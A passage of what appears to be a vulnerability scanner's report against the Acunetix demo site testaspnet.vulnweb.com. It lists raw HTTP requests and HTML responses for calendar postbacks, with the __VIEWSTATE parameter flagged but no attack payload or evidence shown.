href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8359&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCA4CqKytoIZGRkIoipOSAcMFwpFSCv5yup3hWCo3A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLuzYC3DgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2BJtsYSrNwQ96wUkxqGDdce9wUyW
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:53 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCA4CqKytoIZGRkIoipOSAcMFwpFSCv5yup3hWCo3A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLuzYC3DgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+JtsYSrNwQ96wUkxqGDdce9wUyW" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:White" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8347&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCA6y0cwdoIZGRkAAou1c1gPNVw1VmOK4df7TXg8QA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLtpO%2BnCQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2BzUvQdHc4LNB1H4w68tAK2IxW6C
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:57 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCA6y0cwdoIZGRkAAou1c1gPNVw1VmOK4df7TXg8QA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLtpO+nCQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+zUvQdHc4LNB1H4w68tAK2IxW6C" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:White" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a 